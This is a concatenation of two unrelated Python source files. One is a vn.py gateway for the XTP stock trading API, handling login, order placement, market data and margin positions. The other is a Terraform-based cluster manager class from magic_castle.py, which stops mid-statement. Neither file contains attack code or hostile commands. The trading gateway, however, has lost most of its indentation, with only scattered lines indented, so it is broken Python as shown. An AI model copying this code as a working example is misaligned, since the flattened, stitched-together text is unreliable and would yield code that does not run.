TickData, ContractData, OrderData, TradeData,
PositionData, AccountData)
from vnpy.trader.utility import get_folder_path
API = XTP.API
EXCHANGE_XTP2VT = {
XTP_EXCHANGE_TYPE.XTP_EXCHANGE_SH: Exchange.SSE,
XTP_EXCHANGE_TYPE.XTP_EXCHANGE_SZ: Exchange.SZSE,
}
EXCHANGE_VT2XTP = {v: k for k, v in EXCHANGE_XTP2VT.items()}
MARKET_XTP2VT = {
XTP_MARKET_TYPE.XTP_MKT_SH_A: Exchange.SSE,
XTP_MARKET_TYPE.XTP_MKT_SZ_A: Exchange.SZSE
}
MARKET_VT2XTP = {v: k for k, v in MARKET_XTP2VT.items()}
PRODUCT_XTP2VT = {
XTP_TICKER_TYPE.XTP_TICKER_TYPE_STOCK: Product.EQUITY,
XTP_TICKER_TYPE.XTP_TICKER_TYPE_INDEX: Product.INDEX,
XTP_TICKER_TYPE.XTP_TICKER_TYPE_FUND: Product.FUND,
XTP_TICKER_TYPE.XTP_TICKER_TYPE_BOND: Product.BOND,
XTP_TICKER_TYPE.XTP_TICKER_TYPE_OPTION: Product.OPTION,
XTP_TICKER_TYPE.XTP_TICKER_TYPE_UNKNOWN: Product.EQUITY,
}
# DIRECTION_VT2XTP = {
# Direction.LONG: XTP_SIDE_BUY,
# Direction.SHORT: XTP_SIDE_SELL
# }
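# Side mapping for margin accounts: each (direction, offset) pair selects margin
# trade, short sell, or the corresponding repayment side, while Offset.NONE
# falls back to the ordinary cash buy/sell sides.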
DIRECTION_VT2XTP = {
(Direction.LONG, Offset.OPEN): XTP_SIDE_MARGIN_TRADE,
(Direction.SHORT, Offset.CLOSE): XTP_SIDE_REPAY_MARGIN,
(Direction.SHORT, Offset.OPEN): XTP_SIDE_SHORT_SELL,
(Direction.LONG, Offset.CLOSE): XTP_SIDE_REPAY_STOCK,
(Direction.SHORT, Offset.NONE): XTP_SIDE_SELL,
(Direction.LONG, Offset.NONE): XTP_SIDE_BUY,
}
DIRECTION_XTP2VT = {v: k for k, v in DIRECTION_VT2XTP.items()}
ORDERTYPE_VT2XTP = {
OrderType.LIMIT: XTP_PRICE_TYPE.XTP_PRICE_LIMIT,
OrderType.MARKET: XTP_PRICE_TYPE.XTP_PRICE_BEST5_OR_CANCEL
}
ORDERTYPE_XTP2VT = {v: k for k, v in ORDERTYPE_VT2XTP.items()}
STATUS_XTP2VT = {
XTP_ORDER_STATUS_TYPE.XTP_ORDER_STATUS_INIT: Status.SUBMITTING,
XTP_ORDER_STATUS_TYPE.XTP_ORDER_STATUS_ALLTRADED: Status.ALLTRADED,
XTP_ORDER_STATUS_TYPE.XTP_ORDER_STATUS_PARTTRADEDQUEUEING: Status.PARTTRADED,
XTP_ORDER_STATUS_TYPE.XTP_ORDER_STATUS_PARTTRADEDNOTQUEUEING: Status.CANCELLED,
XTP_ORDER_STATUS_TYPE.XTP_ORDER_STATUS_NOTRADEQUEUEING: Status.NOTTRADED,
XTP_ORDER_STATUS_TYPE.XTP_ORDER_STATUS_CANCELED: Status.CANCELLED,
XTP_ORDER_STATUS_TYPE.XTP_ORDER_STATUS_REJECTED: Status.REJECTED,
}
symbol_name_map = {}
symbol_exchange_map = {}
class XtpGateway(BaseGateway):
    default_setting = {
        "account": "",
        "password": "",
        "client id": 1,
        "quote address": "",
        "quote port": 0,
        "trade address": "",
        "trade port": 0,
        "quote protocol": ["TCP", "UDP"],
        "authorization code": ""
    }
exchanges = list(EXCHANGE_VT2XTP.keys())
def __init__(self, event_engine: EventEngine):
""""""
super().__init__(event_engine, "XTP")
self.quote_api = XtpQuoteApi(self)
self.trader_api = XtpTraderApi(self)
set_async_callback_exception_handler(
self._async_callback_exception_handler)
def connect(self, setting: dict):
""""""
        userid = setting['account']
        password = setting['password']
        client_id = int(setting['client id'])
        quote_ip = setting['quote address']
        quote_port = int(setting['quote port'])
        trader_ip = setting['trade address']
        trader_port = int(setting['trade port'])
        quote_protocol = setting["quote protocol"]
        software_key = setting["authorization code"]
self.quote_api.connect(userid, password, client_id,
quote_ip, quote_port, quote_protocol)
self.trader_api.connect(userid, password, client_id,
trader_ip, trader_port, software_key)
self.init_query()
def close(self):
""""""
self.quote_api.close()
self.trader_api.close()
def subscribe(self, req: SubscribeRequest):
""""""
        self.quote_api.subscribe(req)
def send_order(self, req: OrderRequest) -> str:
""""""
return self.trader_api.send_order(req)
def cancel_order(self, req: CancelRequest):
""""""
self.trader_api.cancel_order(req)
def query_account(self):
""""""
self.trader_api.query_account()
def query_position(self):
""""""
self.trader_api.query_position()
def process_timer_event(self, event):
""""""
self.count += 1
if self.count < 2:
return
self.count = 0
func = self.query_functions.pop(0)
func()
self.query_functions.append(func)
def init_query(self):
""""""
self.count = 0
self.query_functions = [self.query_account, self.query_position]
self.event_engine.register(EVENT_TIMER, self.process_timer_event)
def _async_callback_exception_handler(self, e: AsyncDispatchException):
        error_str = f"An internal error occurred:\nlocation: {e.instance}.{e.function_name}, details: {e.what}"
print(error_str)
class XtpQuoteApi(API.QuoteSpi):
def __init__(self, gateway: BaseGateway):
""""""
super().__init__()
self.gateway = gateway
self.gateway_name = gateway.gateway_name
self.userid = ""
self.password = ""
self.client_id: int = 0
self.server_ip = ""
self.server_port: int = 0
self.server_protocol = ""
self.api = None
def connect(
self,
userid: str,
password: str,
client_id: int,
server_ip: str,
server_port: int,
quote_protocol: str
):
""""""
if self.api:
return
self.userid = userid
self.password = password
self.client_id = client_id
self.server_ip = server_ip
self.server_port = server_port
if quote_protocol == "TCP":
self.quote_protocol = XTP_PROTOCOL_TYPE.XTP_PROTOCOL_TCP
else:
self.quote_protocol = XTP_PROTOCOL_TYPE.XTP_PROTOCOL_UDP
# Create API object
path = str(get_folder_path(self.gateway_name.lower()))
self.api = API.QuoteApi.CreateQuoteApi(
self.client_id,
path,
XTP_LOG_LEVEL.XTP_LOG_LEVEL_TRACE
)
self.api.RegisterSpi(self)
        self.gateway.write_log("Quote interface initialized successfully")
# Login to server
Thread(target=self.login).start()
def login(self):
""""""
ret = self.api.Login(
self.server_ip,
self.server_port,
self.userid,
self.password,
self.quote_protocol
)
        if not ret:
            msg = "Quote server login successful"
            self.query_contract()
        else:
            msg = f"Quote server login failed, reason: {ret}"
        self.gateway.write_log(msg)
def close(self):
""""""
if self.api:
self.api.RegisterSpi(None)
self.api.Release()
    def subscribe(self, req: SubscribeRequest):
""""""
xtp_exchange = EXCHANGE_VT2XTP.get(req.exchange, "")
self.api.SubscribeMarketData([req.symbol], xtp_exchange)
def query_contract(self):
""""""
for exchange_id in EXCHANGE_XTP2VT.keys():
self.api.QueryAllTickers(exchange_id)
def check_error(self, func_name: str, error_info: XTPRspInfoStruct):
""""""
if error_info and error_info.error_id:
            msg = f"{func_name} error, code: {error_info.error_id}, message: {error_info.error_msg}"
self.gateway.write_log(msg)
return True
else:
return False
def OnDisconnected(self, reason: int) -> Any:
""""""
        self.gateway.write_log("Quote server disconnected")
self.login()
def OnError(self, error_info: XTPRspInfoStruct) -> Any:
""""""
        self.check_error("Quote interface", error_info)
def OnSubMarketData(self, ticker: XTPSpecificTickerStruct, error_info: XTPRspInfoStruct,
is_last: bool) -> Any:
""""""
        self.check_error("Subscribe market data", error_info)
def OnUnSubMarketData(self, ticker: XTPSpecificTickerStruct, error_info: XTPRspInfoStruct,
is_last: bool) -> Any:
""""""
pass
def OnDepthMarketData(self, market_data: XTPMarketDataStruct, bid1_qty: Sequence[int],
bid1_count: int, max_bid1_count: int, ask1_qty: Sequence[int],
ask1_count: int, max_ask1_count: int) -> Any:
""""""
timestamp = str(market_data.data_time)
dt = datetime.strptime(timestamp, "%Y%m%d%H%M%S%f")
tick = TickData(
symbol=market_data.ticker,
exchange=EXCHANGE_XTP2VT[market_data.exchange_id],
datetime=dt,
volume=market_data.qty,
last_price=market_data.last_price,
limit_up=market_data.upper_limit_price,
limit_down=market_data.lower_limit_price,
open_price=market_data.open_price,
high_price=market_data.high_price,
low_price=market_data.low_price,
pre_close=market_data.pre_close_price,
bid_price_1=market_data.bid[0],
bid_price_2=market_data.bid[1],
bid_price_3=market_data.bid[2],
bid_price_4=market_data.bid[3],
bid_price_5=market_data.bid[4],
ask_price_1=market_data.ask[0],
ask_price_2=market_data.ask[1],
ask_price_3=market_data.ask[2],
ask_price_4=market_data.ask[3],
ask_price_5=market_data.ask[4],
bid_volume_1=market_data.bid_qty[0],
bid_volume_2=market_data.bid_qty[1],
bid_volume_3=market_data.bid_qty[2],
bid_volume_4=market_data.bid_qty[3],
bid_volume_5=market_data.bid_qty[4],
ask_volume_1=market_data.ask_qty[0],
ask_volume_2=market_data.ask_qty[1],
ask_volume_3=market_data.ask_qty[2],
ask_volume_4=market_data.ask_qty[3],
ask_volume_5=market_data.ask_qty[4],
gateway_name=self.gateway_name
)
tick.name = symbol_name_map.get(tick.vt_symbol, tick.symbol)
self.gateway.on_tick(tick)
def OnSubOrderBook(self, ticker: XTPSpecificTickerStruct, error_info: XTPRspInfoStruct,
is_last: bool) -> Any:
""""""
pass
def OnUnSubOrderBook(self, ticker: XTPSpecificTickerStruct, error_info: XTPRspInfoStruct,
is_last: bool) -> Any:
""""""
pass
def OnOrderBook(self, order_book: OrderBookStruct) -> Any:
""""""
pass
def OnSubTickByTick(self, ticker: XTPSpecificTickerStruct, error_info: XTPRspInfoStruct,
is_last: bool) -> Any:
""""""
pass
def OnUnSubTickByTick(self, ticker: XTPSpecificTickerStruct, error_info: XTPRspInfoStruct,
is_last: bool) -> Any:
""""""
pass
def OnTickByTick(self, tbt_data: XTPTickByTickStruct) -> Any:
""""""
pass
def OnSubscribeAllMarketData(self, exchange_id: XTP_EXCHANGE_TYPE,
error_info: XTPRspInfoStruct) -> Any:
""""""
pass
def OnUnSubscribeAllMarketData(self, exchange_id: XTP_EXCHANGE_TYPE,
error_info: XTPRspInfoStruct) -> Any:
""""""
pass
def OnSubscribeAllOrderBook(self, exchange_id: XTP_EXCHANGE_TYPE,
error_info: XTPRspInfoStruct) -> Any:
""""""
pass
def OnUnSubscribeAllOrderBook(self, exchange_id: XTP_EXCHANGE_TYPE,
error_info: XTPRspInfoStruct) -> Any:
""""""
pass
def OnSubscribeAllTickByTick(self, exchange_id: XTP_EXCHANGE_TYPE,
error_info: XTPRspInfoStruct) -> Any:
""""""
pass
def OnUnSubscribeAllTickByTick(self, exchange_id: XTP_EXCHANGE_TYPE,
error_info: XTPRspInfoStruct) -> Any:
""""""
pass
def OnQueryAllTickers(self, ticker_info: XTPQuoteStaticInfo, error_info: XTPRspInfoStruct,
is_last: bool) -> Any:
""""""
        if self.check_error("Query contracts", error_info):
return
contract = ContractData(
symbol=ticker_info.ticker,
exchange=EXCHANGE_XTP2VT[ticker_info.exchange_id],
name=ticker_info.ticker_name,
product=PRODUCT_XTP2VT[ticker_info.ticker_type],
size=1,
pricetick=ticker_info.price_tick,
min_volume=ticker_info.buy_qty_unit,
gateway_name=self.gateway_name
)
self.gateway.on_contract(contract)
symbol_name_map[contract.vt_symbol] = contract.name
if contract.product != Product.INDEX:
symbol_exchange_map[contract.symbol] = contract.exchange
if is_last:
            self.gateway.write_log(f"{contract.exchange.value} contract information query succeeded")
def OnQueryTickersPriceInfo(self, ticker_info: XTPTickerPriceInfo, error_info: XTPRspInfoStruct,
is_last: bool) -> Any:
""""""
pass
def OnSubscribeAllOptionMarketData(self, exchange_id: XTP_EXCHANGE_TYPE,
error_info: XTPRspInfoStruct) -> Any:
""""""
pass
def OnUnSubscribeAllOptionMarketData(self, exchange_id: XTP_EXCHANGE_TYPE,
error_info: XTPRspInfoStruct) -> Any:
""""""
pass
def OnSubscribeAllOptionOrderBook(self, exchange_id: XTP_EXCHANGE_TYPE,
error_info: XTPRspInfoStruct) -> Any:
""""""
pass
def OnUnSubscribeAllOptionOrderBook(self, exchange_id: XTP_EXCHANGE_TYPE,
error_info: XTPRspInfoStruct) -> Any:
""""""
pass
def OnSubscribeAllOptionTickByTick(self, exchange_id: XTP_EXCHANGE_TYPE,
error_info: XTPRspInfoStruct) -> Any:
""""""
pass
def OnUnSubscribeAllOptionTickByTick(self, exchange_id: XTP_EXCHANGE_TYPE,
error_info: XTPRspInfoStruct) -> Any:
""""""
pass
class XtpTraderApi(API.TraderSpi):
def __init__(self, gateway: BaseGateway):
""""""
super().__init__()
self.gateway = gateway
self.gateway_name = gateway.gateway_name
self.userid = ""
self.password = ""
self.client_id = ""
self.server_ip = ""
self.server_port = ""
self.software_key = ""
self.api = None
self.session_id = 0
self.reqid = 0
# Whether current account supports margin or option
self.margin_trading = False
self.option_trading = False
#
self.short_positions = {}
def connect(
self,
userid: str,
password: str,
client_id: int,
server_ip: str,
server_port: int,
software_key: str
):
""""""
if self.api:
return
self.userid = userid
self.password = password
self.client_id = client_id
self.server_ip = server_ip
self.server_port = server_port
self.software_key = software_key
# Create API object
path = str(get_folder_path(self.gateway_name.lower()))
self.api = API.TraderApi.CreateTraderApi(
self.client_id,
path,
XTP_LOG_LEVEL.XTP_LOG_LEVEL_TRACE
)
self.api.RegisterSpi(self)
self.api.SetSoftwareKey(self.software_key)
self.api.SubscribePublicTopic(XTP_TE_RESUME_TYPE.XTP_TERT_RESTART)
        self.gateway.write_log("Trading interface initialized successfully")
# Login to server
Thread(target=self.login).start()
def login(self):
""""""
self.session_id = self.api.Login(
self.server_ip,
self.server_port,
self.userid,
self.password,
XTP_PROTOCOL_TYPE.XTP_PROTOCOL_TCP
)
        if self.session_id:
            msg = "Trading server login successful"
        else:
            error = self.api.GetApiLastError()
            msg = f"Trading server login failed, reason: {error.error_msg}"
        self.gateway.write_log(msg)
def close(self):
""""""
if self.api:
self.api.RegisterSpi(None)
self.api.Release()
def send_order(self, req: OrderRequest) -> str:
""""""
if req.exchange not in MARKET_VT2XTP:
            self.gateway.write_log(f"Order rejected, unsupported exchange: {req.exchange.value}")
return ""
if req.type not in ORDERTYPE_VT2XTP:
            self.gateway.write_log(f"Order rejected, unsupported order type: {req.type.value}")
return ""
xtp_req = XTPOrderInsertInfo()
xtp_req.ticker = req.symbol
xtp_req.market = MARKET_VT2XTP[req.exchange]
xtp_req.price = req.price
xtp_req.quantity = int(req.volume)
xtp_req.side = DIRECTION_VT2XTP.get((req.direction, req.offset), "")
xtp_req.price_type = ORDERTYPE_VT2XTP[req.type]
if req.offset == Offset.NONE:
xtp_req.business_type = XTP_BUSINESS_TYPE.XTP_BUSINESS_TYPE_CASH
else:
xtp_req.business_type = XTP_BUSINESS_TYPE.XTP_BUSINESS_TYPE_MARGIN
orderid = self.api.InsertOrder(xtp_req, self.session_id)
order = req.create_order_data(str(orderid), self.gateway_name)
self.gateway.on_order(order)
return order.vt_orderid
def cancel_order(self, req: CancelRequest):
""""""
self.api.CancelOrder(int(req.orderid), self.session_id)
def query_account(self):
""""""
if not self.api:
return
self.reqid += 1
self.api.QueryAsset(self.session_id, self.reqid)
def query_position(self):
""""""
if not self.api:
return
self.reqid += 1
self.api.QueryPosition("", self.session_id, self.reqid)
if self.margin_trading:
self.reqid += 1
self.api.QueryCreditDebtInfo(self.session_id, self.reqid)
def check_error(self, func_name: str, error_info: XTPRspInfoStruct):
""""""
if error_info and error_info.error_id:
            msg = f"{func_name} error, code: {error_info.error_id}, message: {error_info.error_msg}"
self.gateway.write_log(msg)
return True
else:
return False
def OnDisconnected(self, session_id: int, reason: int) -> Any:
""""""
        self.gateway.write_log("Trading server disconnected")
self.login()
def OnError(self, error_info: XTPRspInfoStruct) -> Any:
""""""
        self.check_error("Trading interface", error_info)
def OnOrderEvent(self, order_info: XTPOrderInfo, error_info: XTPRspInfoStruct,
session_id: int) -> Any:
""""""
        self.check_error("Order submission", error_info)
direction, offset = DIRECTION_XTP2VT[order_info.side]
order = OrderData(
symbol=order_info.ticker,
exchange=MARKET_XTP2VT[order_info.market],
orderid=str(order_info.order_xtp_id),
type=ORDERTYPE_XTP2VT[order_info.price_type],
direction=direction,
offset=offset,
price=order_info.price,
volume=order_info.quantity,
traded=order_info.qty_traded,
status=STATUS_XTP2VT[order_info.order_status],
time=order_info.insert_time,
gateway_name=self.gateway_name
)
self.gateway.on_order(order)
def OnTradeEvent(self, trade_info: XTPTradeReport, session_id: int) -> Any:
""""""
direction, offset = DIRECTION_XTP2VT[trade_info.side]
trade = TradeData(
symbol=trade_info.ticker,
exchange=MARKET_XTP2VT[trade_info.market],
orderid=str(trade_info.order_xtp_id),
tradeid=str(trade_info.exec_id),
direction=direction,
offset=offset,
price=trade_info.price,
volume=trade_info.quantity,
time=trade_info.trade_time,
gateway_name=self.gateway_name
)
self.gateway.on_trade(trade)
def OnCancelOrderError(self, cancel_info: XTPOrderCancelInfo, error_info: XTPRspInfoStruct,
session_id: int) -> Any:
""""""
        self.check_error("Order cancellation", error_info)
def OnQueryOrder(self, order_info: XTPOrderInfo, error_info: XTPRspInfoStruct,
is_last: bool, session_id: int) -> Any:
""""""
        if self.check_error("Query orders", error_info):
return
self.updateOrder(order_info)
if is_last:
            self.gateway.write_log("Order information query succeeded")
def OnQueryTrade(self, trade_info: XTPTradeReport, error_info: XTPRspInfoStruct,
is_last: bool, session_id: int) -> Any:
""""""
        if self.check_error("Query trades", error_info):
return
self.updateTrade(trade_info)
if is_last:
            self.gateway.write_log("Trade information query succeeded")
def OnQueryPosition(self, xtp_position: XTPQueryStkPositionRsp, error_info: XTPRspInfoStruct,
request_id: int, is_last: bool, session_id: int) -> Any:
""""""
position = PositionData(
symbol=xtp_position.ticker,
exchange=MARKET_XTP2VT[xtp_position.market],
direction=Direction.LONG,
volume=xtp_position.total_qty,
frozen=xtp_position.locked_position,
price=xtp_position.avg_price,
pnl=xtp_position.unrealized_pnl,
yd_volume=xtp_position.yesterday_position,
gateway_name=self.gateway_name
)
self.gateway.on_position(position)
def OnQueryAsset(self, asset: XTPQueryAssetRsp, error_info: XTPRspInfoStruct,
request_id: int, is_last: bool, session_id: int) -> Any:
""""""
account = AccountData(
accountid=self.userid,
balance=asset.buying_power,
frozen=asset.withholding_amount,
gateway_name=self.gateway_name
)
self.gateway.on_account(account)
if asset.account_type == XTP_ACCOUNT_TYPE.XTP_ACCOUNT_CREDIT:
self.margin_trading = True
elif asset.account_type == XTP_ACCOUNT_TYPE.XTP_ACCOUNT_DERIVE:
self.option_trading = True
def OnQueryStructuredFund(self, fund_info: XTPStructuredFundInfo, error_info: XTPRspInfoStruct,
is_last: bool, session_id: int) -> Any:
""""""
pass
def OnQueryFundTransfer(self, fund_transfer_info: XTPFundTransferNotice, error_info: XTPRspInfoStruct,
is_last: bool, session_id: int) -> Any:
""""""
pass
def OnFundTransfer(self, fund_transfer_info: XTPFundTransferNotice, session_id: int) -> Any:
""""""
pass
def OnQueryETF(self, etf_info: XTPQueryETFBaseRsp, error_info: XTPRspInfoStruct,
is_last: bool, session_id: int) -> Any:
""""""
pass
def OnQueryETFBasket(self, etf_component_info: XTPQueryETFComponentRsp, error_info: XTPRspInfoStruct,
is_last: bool, session_id: int) -> Any:
""""""
pass
def OnQueryIPOInfoList(self, ipo_info: XTPQueryIPOTickerRsp, error_info: XTPRspInfoStruct,
is_last: bool, session_id: int) -> Any:
""""""
pass
def OnQueryIPOQuotaInfo(self, quota_info: XTPQueryIPOQuotaRsp, error_info: XTPRspInfoStruct,
is_last: bool, session_id: int) -> Any:
""""""
pass
def OnQueryOptionAuctionInfo(self, option_info: XTPQueryOptionAuctionInfoRsp, error_info: XTPRspInfoStruct,
is_last: bool, session_id: int) -> Any:
""""""
pass
def OnQueryCreditDebtInfo(self, debt_info: XTPCrdDebtInfo, error_info: XTPRspInfoStruct,
request_id: int, is_last: bool, session_id: int) -> Any:
""""""
if debt_info.debt_type == 1:
symbol = debt_info.ticker
exchange = MARKET_XTP2VT[debt_info.market]
position = self.short_positions.get(symbol, None)
if not position:
position = PositionData(
symbol=symbol,
exchange=exchange,
direction=Direction.SHORT,
gateway_name=self.gateway_name
)
self.short_positions[symbol] = position
position.volume += debt_info.remain_qty
if is_last:
for position in self.short_positions.values():
self.gateway.on_position(position)
self.short_positions.clear()
|
magic_castle.py
|
from os import path, environ, mkdir, remove, scandir, rename
from subprocess import run, CalledProcessError
from shutil import rmtree
from threading import Thread
from marshmallow import ValidationError
from models.magic_castle.magic_castle_configuration import MagicCastleConfiguration
from models.magic_castle.cluster_status_code import ClusterStatusCode
from models.magic_castle.plan_type import PlanType
from models.terraform.terraform_state_parser import TerraformStateParser
from models.terraform.terraform_plan_parser import TerraformPlanParser
from models.cloud.cloud_manager import CloudManager
from models.cloud.dns_manager import DnsManager
from models.puppet.provisioning_manager import ProvisioningManager
from exceptions.invalid_usage_exception import *
from exceptions.server_exception import *
from models.constants import TERRAFORM_STATE_FILENAME, CLUSTERS_PATH
from database.database_manager import DatabaseManager
import sqlite3
import logging
import json
DEFAULT_CLOUD = "openstack"
TERRAFORM_PLAN_BINARY_FILENAME = "terraform_plan"
TERRAFORM_PLAN_JSON_FILENAME = "terraform_plan.json"
TERRAFORM_APPLY_LOG_FILENAME = "terraform_apply.log"
TERRAFORM_PLAN_LOG_FILENAME = "terraform_plan.log"
class MagicCastle:
"""
Magic Castle is the class that manages the state of Magic Castle clusters.
It is responsible for building, modifying and destroying clusters using Terraform.
It is also used to parse the state of existing clusters and return it in
a simple dictionary format.
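    A minimal usage sketch (names are illustrative; assumes an open sqlite3
    connection from DatabaseManager and a configuration dict that passes the
    Magic Castle schema validation):

        mc = MagicCastle(database_connection, owner="alice@example.org")
        mc.set_configuration(config_dict)  # parses the dict and derives the hostname
        mc.plan_creation()                 # runs `terraform init` and `terraform plan`
        mc.apply()                         # applies the saved Terraform plan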
"""
def __init__(
self, database_connection: sqlite3.Connection, hostname=None, owner=None
):
self.__database_connection = database_connection
self.__hostname = hostname
self.__owner = owner
self.__configuration = None
self.__status = None
self.__plan_type = None
def get_hostname(self):
return self.__hostname
def get_cluster_name(self):
return self.__hostname.split(".", 1)[0]
def get_domain(self):
return self.__hostname.split(".", 1)[1]
def get_owner(self):
if self.__owner is None:
result = self.__database_connection.execute(
"SELECT owner FROM magic_castles WHERE hostname = ?",
(self.get_hostname(),),
).fetchone()
if result:
self.__owner = result[0]
else:
self.__owner = None
return self.__owner
def get_owner_username(self):
"""
MC Hub stores username in the form of eduPersonPrincipalName.
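        For example, an owner of "alice@example.org" yields the username "alice".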
"""
owner = self.get_owner()
if owner:
return owner.split("@")[0]
return None
def set_configuration(self, configuration: dict):
try:
self.__configuration = MagicCastleConfiguration.get_from_dict(configuration)
self.__hostname = self.__configuration.get_hostname()
except ValidationError:
raise InvalidUsageException(
"The magic castle configuration could not be parsed."
)
def get_status(self) -> ClusterStatusCode:
if self.__status is None:
result = self.__database_connection.execute(
"SELECT status FROM magic_castles WHERE hostname = ?",
(self.get_hostname(),),
).fetchone()
if result:
self.__status = ClusterStatusCode(result[0])
else:
self.__status = ClusterStatusCode.NOT_FOUND
return self.__status
def __update_status(self, status: ClusterStatusCode):
self.__status = status
self.__database_connection.execute(
"UPDATE magic_castles SET status = ? WHERE hostname = ?",
(self.__status.value, self.__hostname),
)
self.__database_connection.commit()
# Log cluster status updates for log analytics
print(
json.dumps(
{
"hostname": self.get_hostname(),
"status": self.__status.value,
"owner": self.get_owner(),
}
),
flush=True,
)
def __rotate_terraform_logs(self, *, apply: bool):
"""
Rotates filenames for logs generated by running `terraform plan` or `terraform apply`.
For instance, it will rename an existing file named terraform_plan.log to terraform_plan.log.1.
Any log file already ending with a number will have its number incremented by one
(e.g. terraform_plan.log.1 would be renamed to terraform_plan.log.2).
:param apply: True to rotate logs of `terraform apply`, False to rotate logs of `terraform plan`.
"""
if apply:
base_file_name = TERRAFORM_APPLY_LOG_FILENAME
else:
base_file_name = TERRAFORM_PLAN_LOG_FILENAME
logs_path = path.join(CLUSTERS_PATH, self.get_hostname())
old_file_names = []
with scandir(logs_path) as it:
for entry in it:
if entry.is_file() and entry.name.startswith(base_file_name):
old_file_names.append(entry.name)
        # Sort by numeric suffix so the log file with the highest index is renamed
        # first; a plain alphabetical sort would misorder suffixes of 10 and above.
        def log_index(name):
            suffix = name.rsplit(".", 1)[-1]
            return int(suffix) if suffix.isdigit() else 0
        old_file_names.sort(key=log_index, reverse=True)
for old_file_name in old_file_names:
if old_file_name == base_file_name:
# terraform_apply.log becomes terraform_apply.log.1
new_file_index = 1
else:
# terraform_apply.log.1 becomes terraform_apply.log.2 and so on
new_file_index = int(old_file_name.split(".")[-1]) + 1
new_file_name = f"{base_file_name}.{new_file_index}"
rename(
self.__get_cluster_path(old_file_name),
self.__get_cluster_path(new_file_name),
)
def get_plan_type(self) -> PlanType:
if self.__plan_type is None:
result = self.__database_connection.execute(
"SELECT plan_type FROM magic_castles WHERE hostname = ?",
(self.get_hostname(),),
).fetchone()
if result:
self.__plan_type = PlanType(result[0])
else:
self.__plan_type = PlanType.NONE
return self.__plan_type
def __update_plan_type(self, plan_type: PlanType):
self.__plan_type = plan_type
self.__database_connection.execute(
"UPDATE magic_castles SET plan_type = ? WHERE hostname = ?",
(self.__plan_type.value, self.__hostname),
)
self.__database_connection.commit()
def get_progress(self):
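        # Reports build progress by comparing the saved `terraform plan` output
        # with the `terraform apply` log (via TerraformPlanParser.get_done_changes).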
if self.__not_found():
raise ClusterNotFoundException
initial_plan = self.__get_plan()
if initial_plan is None:
return None
try:
with open(
self.__get_cluster_path(TERRAFORM_APPLY_LOG_FILENAME), "r"
) as file:
terraform_output = file.read()
except FileNotFoundError:
# terraform apply was not launched yet, therefore the log file does not exist
terraform_output = ""
return TerraformPlanParser.get_done_changes(initial_plan, terraform_output)
def dump_configuration(self, planned_only=False):
"""
Returns the Magic Castle configuration dictionary of the current cluster.
:param planned_only: Set to True to extract configuration exclusively from main.tf.json (runs faster). If set to
False, it will attempt to extract the configuration from the terraform state file if available (and otherwise
use the main.tf.json file).
:return: The configuration dictionary
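        For example, dump_configuration(planned_only=True) reads the configuration
        from main.tf.json rather than the slower Terraform state file.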
"""
if self.__not_found():
raise ClusterNotFoundException
try:
            terraform_state_file_available = self.get_status() not in [
                ClusterStatusCode.BUILD_RUNNING,
                ClusterStatusCode.DESTROY_RUNNING,
            ] and path.exists(self.__get_cluster_path(TERRAFORM_STATE_FILENAME))
if planned_only or not terraform_state_file_available:
self.__configuration = MagicCastleConfiguration.get_from_main_tf_json_file(
self.get_hostname(),
parse_floating_ips_from_state=terraform_state_file_available,
)
else:
self.__configuration = MagicCastleConfiguration.get_from_state_file(
self.get_hostname()
)
return self.__configuration.dump()
except FileNotFoundError:
return dict()
def get_freeipa_passwd(self):
if self.__is_busy():
return None
try:
with open(
self.__get_cluster_path(TERRAFORM_STATE_FILENAME), "r"
) as terraform_state_file:
state = json.load(terraform_state_file)
return TerraformStateParser(state).get_freeipa_passwd()
except FileNotFoundError:
return None
def get_available_resources(self):
if self.__is_busy():
raise BusyClusterException
try:
with open(
self.__get_cluster_path(TERRAFORM_STATE_FILENAME), "r"
) as terraform_state_file:
state = json.load(terraform_state_file)
parser = TerraformStateParser(state)
cloud_manager = CloudManager(
pre_allocated_instance_count=parser.get_instance_count(),
pre_allocated_ram=parser.get_ram(),
pre_allocated_cores=parser.get_cores(),
pre_allocated_volume_count=parser.get_volume_count(),
pre_allocated_volume_size=parser.get_volume_size(),
pre_allocated_floating_ips=parser.get_os_floating_ips(),
)
except FileNotFoundError:
cloud_manager = CloudManager()
return cloud_manager.get_available_resources()
def __is_busy(self):
return self.get_status() in [
ClusterStatusCode.PLAN_RUNNING,
ClusterStatusCode.BUILD_RUNNING,
ClusterStatusCode.DESTROY_RUNNING,
]
def __not_found(self):
return self.get_status() == ClusterStatusCode.NOT_FOUND
def __plan_created(self):
return self.get_status() != ClusterStatusCode.PLAN_RUNNING and path.exists(
self.__get_cluster_path(TERRAFORM_PLAN_BINARY_FILENAME)
)
def __found(self):
return self.get_status() != ClusterStatusCode.NOT_FOUND
def __get_cluster_path(self, sub_path=""):
"""
Returns the absolute path of the current cluster folder.
If sub_path is specified, it is appended to the cluster path.
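        For example, __get_cluster_path("main.tf.json") resolves to
        <CLUSTERS_PATH>/<hostname>/main.tf.json for the current cluster.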
"""
if self.get_hostname():
return path.join(CLUSTERS_PATH, self.get_hostname(), sub_path)
else:
raise FileNotFoundError
def plan_creation(self):
if self.__found():
raise ClusterExistsException
return self.__plan(destroy=False, existing_cluster=False)
def plan_modification(self):
if self.__not_found():
raise ClusterNotFoundException
if self.__is_busy():
raise BusyClusterException
return self.__plan(destroy=False, existing_cluster=True)
def plan_destruction(self):
if self.__not_found():
raise ClusterNotFoundException
if self.__is_busy():
raise BusyClusterException
self.__plan(destroy=True, existing_cluster=True)
def __plan(self, *, destroy, existing_cluster):
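        # For a new cluster, insert the database row and create the cluster folder;
        # then run `terraform init` and `terraform plan`, and export the plan with
        # `terraform show -json` for later progress tracking.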
plan_type = PlanType.DESTROY if destroy else PlanType.BUILD
if existing_cluster:
self.__remove_existing_plan()
previous_status = self.get_status()
else:
self.__database_connection.execute(
"INSERT INTO magic_castles (hostname, cluster_name, domain, status, plan_type, owner) VALUES (?, ?, ?, ?, ?, ?)",
(
self.get_hostname(),
self.get_cluster_name(),
self.get_domain(),
ClusterStatusCode.CREATED.value,
plan_type.value,
self.get_owner(),
),
)
mkdir(self.__get_cluster_path())
previous_status = ClusterStatusCode.CREATED
self.__update_status(ClusterStatusCode.PLAN_RUNNING)
self.__update_plan_type(plan_type)
if not destroy:
self.__configuration.update_main_tf_json_file()
try:
run(
["terraform", "init", "-no-color", "-input=false"],
cwd=self.__get_cluster_path(),
capture_output=True,
check=True,
)
except CalledProcessError:
self.__update_status(previous_status)
raise PlanException(
"An error occurred while initializing Terraform.",
additional_details=f"hostname: {self.get_hostname()}",
)
self.__rotate_terraform_logs(apply=False)
with open(
